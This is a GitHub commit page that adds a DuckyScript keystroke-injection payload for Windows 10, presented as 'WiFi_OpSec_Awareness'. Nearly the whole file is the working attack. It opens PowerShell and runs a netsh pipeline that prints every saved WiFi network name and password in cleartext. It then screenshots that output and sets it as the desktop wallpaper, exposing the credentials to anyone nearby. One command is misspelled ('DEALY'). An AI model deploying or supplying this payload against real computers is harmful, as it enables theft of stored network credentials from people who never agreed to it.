Create payload.txt

pull/73/head
LulzAnarchyAnon 2022-07-02 09:26:02 -07:00 committed by GitHub
parent 2c7e3869be
commit 315e0fd4e8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 49 additions and 0 deletions

View File

@ -0,0 +1,49 @@
REM Title: WiFi_OpSec_Awareness
REM Author: LulzAnarchyAnon
REM Description: PowerShell is opened, and a script
REM runs that shows all WiFi Profile names, and
REM passwords. A screenshot is then taken, and saved
REM to the Pictures\Screenshots folder. It is then
REM set as the Desktop wallpaper.
REM Target: Windows 10 PowerShell
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0
REM Category: General
GUI r
DELAY 100
STRING powershell
DELAY 200
ENTER
DELAY 200
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
DELAY 1000
ENTER
DELAY 500
ALT ENTER
DELAY 1000
GUI PRINTSCREEN
DELAY 500
ALT ENTER
DELAY 500
STRING explorer.exe
DELAY 200
ENTER
DELAY 200
ALT d
DEALY 200
STRING Pictures\Screenshots
DELAY 200
ENTER
DELAY 1000
CTRL a
DELAY 200
ALT J
DELAY 200
B
DELAY 200
ALT F4
DELAY 500
STRING exit
DELAY 100
ENTER